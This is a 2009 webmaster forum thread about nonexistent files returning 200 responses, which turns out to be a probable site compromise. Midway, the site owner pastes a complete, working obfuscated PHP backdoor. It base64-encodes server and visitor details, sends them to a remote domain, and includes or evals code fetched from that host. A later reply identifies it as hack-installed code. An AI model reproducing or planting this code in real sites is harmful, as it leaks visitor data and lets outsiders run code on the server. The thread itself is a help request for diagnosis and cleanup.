Check your .htaccess file to determine why a request for a nonexistent file is being redirected with a 301. Perhaps it's just your www<->non-www redirect (if you do that), but if so, there should be a second request to the same file, with or without the www (whichever is correct).

For any nonexistent file that is showing a 200 (Success) result code, go look at your folders ON your server (cPanel FileManager, or FTP) and make sure those files really do not exist.

In my .htaccess it just links to a php file which has error handling included. In terms of the requests with a 200 response the files are not on my server for sure. Is there anyway of stopping this?

Ok, I think I understand what's happening: some of the functions that might ordinarily be handled in .htaccess are being done by your php file, including the handling of 404 errors.

What your script is probably doing in the case of a File Not Found is sending a page that says "Error 404 - File Not Found", but in fact that page is sent out with a response code of 200.

That is generally not a good idea because search engines will get a 200 response no matter what file they request, which makes it impossible for them to tell which pages do exist on your site and which don't, and they don't like that.

The solution is to remove the "404" handling from the php script and just let Apache do its default behavior - sending the true 404 response.

This is the reason you're seeing the "200" in your logs. As long as you're sure the file isn't there, the 200's aren't an indication that you've been hacked and the file placed there by someone else.

After a few hours of log accumulation, you should find your site is sending out 404's, and these strange requests are merely strange requests that aren't succeeding in doing anything malicious.

*** The solution is to remove the "404" handling from the php script and just let Apache do its default behavior - sending the true 404 response. ***

... or rewrite the error-handling part of the script so that it actually does send

HEADER 404 Not Found

as needed.

Thanks for the help here will try this and let ye know how I get on

I have a paypal ipn class on my site which is now showing as a post call in the log file even though no purchase has been made. My login page and numerous other of my pages have shown in the log file even though nobody has been at them.

Im sorry if this is stupid but I dont know how to make those changes to the php file.

This is the code contained within it:

[<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])
?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])
?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])
?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])
?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])
?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])
?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])
?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])
?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d)."
.".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h)."
.e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&
md5($_REQUEST["q"])=="e9c2ec5f1ba5ebefd58e5cb889efd158") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);
curl_close($cu);eval($o);};
?>]

Could ye help?

Thanks

[edited by: jdMorgan at 1:29 am (utc) on Jan. 29, 2009]
[edit reason] Forced wrap to prevent side-scrolling. [/edit]

Where did you get that code?

Unless it came from PayPal and does a lot of encoding for some sort of security reasons, it doesn't look good to me. I did a web search on
$a=(isset($_SERVER["HTTP_HOST"])
Even though that is a simple and nonmalicious piece of code by itself, most of the search results appear to be about code just like yours, that was installed by a hack. I didn't do much more than glance at the results, but unless you know where that code came from, you should follow this up carefully. You might have got hacked, after all.

[edited by: SteveWh at 2:20 pm (utc) on Jan. 29, 2009]